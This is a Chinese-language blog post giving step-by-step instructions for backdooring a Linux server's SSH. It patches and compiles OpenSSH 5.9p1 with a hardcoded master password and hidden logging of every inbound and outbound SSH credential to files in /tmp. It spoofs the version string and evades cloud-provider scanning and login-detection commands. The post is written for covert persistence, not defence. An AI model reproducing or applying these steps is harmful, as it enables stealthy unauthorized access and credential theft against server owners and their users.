linux影子账户,ssh后门账户,ssh维持权限

#SSH后门万能密码,linux影子账户，ssh后门密码
---

###标题如上，就是在linux的系统中留下一个后门账户，方便日后维护及相关信息搜索。如果直接留下后门会很容易被阿里云、腾讯云扫描到，所以做好的留一个万能密码在系统。

---

```废话不多说了，我们开始。。。。```
>先说下测试环境：
>云厂商：阿里云
>系统：Centos 7.9 x64
>内存：随意
>硬盘：随意
>原ssh版本：OpenSSH_7.4p1, OpenSSL 1.0.2k-fips  26 Jan 2017
![](https://leanote.com/api/file/getImage?fileId=636eadd4ab64411710a5eb0f)

----
**第一步：上传和谐版到服务器root目录，此时我是目录，自行更改。**

![](https://leanote.com/api/file/getImage?fileId=636ea823ab64411710a5eae9)
![](https://leanote.com/api/file/getImage?fileId=636eaebdab64411710a5eb1a)
> openssh-5.9p1.tar.gz-----------------（正常的openssh包）
> 0x06-openssh-5.9p1.patch.tar.gz------(补丁包)

---

**第二步：一些必要额准备工作，后面会用到。**

###首先查看一下SSH的版本号，记录下来
>```ssh -V```

![](https://leanote.com/api/file/getImage?fileId=636eae5aab64411710a5eb13)

---
**第三步：解压相关的文件。***

>```tar zxvf openssh-5.9p1.tar.gz```
>```tar zxvf 0x06-openssh-5.9p1.patch.tar.gz```

![](https://leanote.com/api/file/getImage?fileId=636eb1a7ab64411710a5eb31)

---

**第四步:打补丁，注入后门**

>复制“openssh-5.9p1.patch”目录下的“sshbd5.9p1.diff”文件到“openssh-5.9p1”下。

![](https://leanote.com/api/file/getImage?fileId=636eb1a7ab64411710a5eb32)

---

**第五步：打补丁，此处如果提示“patch 未找到命令”；执行```yum -y install patch```安装即可。**

>```patch < sshbd5.9p1.diff ```----------打补丁命令

![](https://leanote.com/api/file/getImage?fileId=636eb1faab64411710a5eb35)

---

**第六步：修改后门密码(修改隐藏密码)**

>```vi includes.h```---------修改后门密码命令
![](https://leanote.com/api/file/getImage?fileId=636eb3f6ab64411710a5eb41)

**直接找到“includes.h”最后就好！**

>```177 #define ILOG "/tmp/.ilog"```
>```178 #define OLOG "/tmp/.olog"```
>```179 #define SECRETPW "admin123"```

---

>179行：SECRETPW 是万能密码可以自己修改;
>177行：ILOG 是记录登录到本机的用户名和密码;
>178行：OLOG 是记录本机登录到远程的用户名和密码。

**注意：此处可以看到在图片里ilog、olog前面都没有加“点”的字符，这里熟悉linux的朋友都知道，点的意思就是隐藏的意思，这样更不容易察觉。**

---

**第七步，隐藏版号，避免被察觉。**

>```vim version.h```----------修改SSH版本好，使其版本一致不易被管理员发现和察觉。

![](https://leanote.com/api/file/getImage?fileId=636eb6cfab64411709a79893)

**注意：这里应该记得吧，在第二步的时候我们就查询了原有系统的版本号，如上图红色是原文件默认的版本，蓝色箭头是我们需要的版本，此处看到两个一样的参数，是为了更好的展示给大家看故意复制的，后面是需要删除的，不要学我哦~~**

---

**第八步：安装编译环境**

>yum install -y openssl openssl-devel pam-devel
>yum install zlib-devel
>yum install gcc
>yum install  gcc-c++
>yum install openssl
>yum install openssl-devel

**这里可能注意到有重复的命令，不用担心多执行一次也是没关系的，有的时候先后顺序的影响都会影响成功失败。**

![](https://leanote.com/api/file/getImage?fileId=636ebbd4ab64411709a798b4)

**上图可以看出默认就已经安转过了，再次安装的时候提示不需要更新，多执行一次也无妨，此处我们可以用“echo $?”检查命令执行情况，返回的数值只要等于“0”就说明没有错误，凡是大于“0”都是不行的。**

---

**第九步：配置相关参数及文件**

>```./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5```

![](https://leanote.com/api/file/getImage?fileId=636ebd75ab64411709a798bd)

>**配置大概在1分钟以内，见上图说明没有问题，可以继续洗衣歌步骤。**

---

**第十步：编译及安装**

>**```先执行“make”完成无报错后执行“make install”```**

![](https://leanote.com/api/file/getImage?fileId=636ebf11ab64411710a5eb92)

>**"make"见上图编译完成，大概需要1分钟。**

![](https://leanote.com/api/file/getImage?fileId=636ebfa1ab64411709a798cc)

>**"make install"大概需要10秒钟，见到上图及“[RSA1 2048]”代表本系列操作全部完成。接下来就是验证阶段了。**

---
**第十一步：验证及问题总结**

>**注意：在我测试阶段使用腾讯云出现了重启无法连接服务器的情况，经过查阅资料可能是以下文件权限问题造成，可在“第十步”之前执行下面命令。**

>```chmod 620 moduli```
>```chmod 600 sshd_config ssh_host_ecdsa_key ssh_host_rsa_key```
>```chmod 644 ssh_config ssh_host_ecdsa_key.pub ssh_host_rsa_key.pub```

---

>**此种方法后会出现SSHD服务无法通过“systemctl”、“service”重启的情况，但是重启服务器可正常使用，到写本文是未找到解决方法。见下图**

![](https://leanote.com/api/file/getImage?fileId=636ec2cdab64411709a798e1)

>**虽然此种方法不是特别的完美，但是比较欣慰的是"w"、"id"、"whoami"等命令均无法查出登录的详情，见下图就知道了。**

![](https://leanote.com/api/file/getImage?fileId=636ec428ab64411709a798eb)

---

>###心得：好了，好久没写文章了，今晚有时间加了个班写了一篇，也是鼓励我自己，不管什么时候什么事情都是有转机及机会的，但是态度必须先拿出来，不管前面多少艰难险阻，只要有持之以恒的心，事情总会出现转机！做一个乐天派！卷嘛！卷死他们！加油！奋斗吧！

梅志克斯-matrix 's Blog

linux影子账户,ssh后门账户,ssh维持权限

导航

最近发表

友情链接